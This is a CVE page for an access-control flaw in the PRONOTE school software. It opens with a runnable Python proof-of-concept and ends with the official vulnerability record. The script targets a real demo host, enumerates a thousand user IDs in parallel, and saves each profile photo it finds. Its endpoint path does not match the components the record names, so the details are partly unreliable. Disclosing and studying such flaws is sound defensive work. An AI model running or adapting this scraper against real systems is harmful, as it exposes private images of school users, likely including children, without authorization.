CVE-2025-69727

import requests import concurrent.futures # CVE-2025-69727 PoC - IDOR in INDEX-EDUCATION PRONOTE avatar access # Target: User profile images can be accessed via predictable URLs TARGET_URL = "https://demo.index-education.net/pronote" HEADERS = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } def fetch_avatar(user_id): """Attempt to fetch user avatar by user ID""" # Construct predictable URL for avatar access url = f"{TARGET_URL}/api/avatar?user_id={user_id}" try: response = requests.get(url, headers=HEADERS, timeout=10) if response.status_code == 200 and 'image' in response.headers.get('Content-Type', ''): print(f"[+] Found avatar for user_id: {user_id}") # Save avatar with open(f"avatar_{user_id}.jpg", 'wb') as f: f.write(response.content) return user_id except Exception as e: pass return None def main(): print(f"[*] CVE-2025-69727 PoC - PRONOTE Avatar IDOR") print(f"[*] Target: {TARGET_URL}") # Brute force user IDs (example range) user_ids = range(1000, 2000) with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor: results = list(executor.map(fetch_avatar, user_ids)) found = [r for r in results if r] print(f"[*] Found {len(found)} avatars") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-69727", "sourceIdentifier": "[email protected]", "published": "2026-03-16T19:16:14.560", "lastModified": "2026-05-05T20:51:09.493", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Incorrect Access Control vulnerability exists in INDEX-EDUCATION PRONOTE prior to 2025.2.8. The affected components (index.js and composeUrlImgPhotoIndividu) allow the construction of direct URLs to user profile images based solely on predictable identifiers such as user IDs and names. Due to missing authorization checks and lack of rate-limiting when generating or accessing these URLs, an unauthenticated or unauthorized actor may retrieve profile pictures of users by crafting requests with guessed or known identifiers."}, {"lang": "es", "value": "Una vulnerabilidad de control de acceso incorrecto existe en INDEX-EDUCATION PRONOTE anterior a 2025.2.8. Los componentes afectados (index.js y composeUrlImgPhotoIndividu) permiten la construcción de URL directas a imágenes de perfil de usuario basándose únicamente en identificadores predecibles como ID de usuario y nombres. Debido a la falta de comprobaciones de autorización y la ausencia de limitación de velocidad al generar o acceder a estas URL, un actor no autenticado o no autorizado puede recuperar imágenes de perfil de usuarios elaborando solicitudes con identificadores adivinados o conocidos."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://demo.index-education.net/pronote", "source": "[email protected]"}, {"url": "https://github.com/0xZeroSec/CVE-2025-69727", "source": "[email protected]"}]}}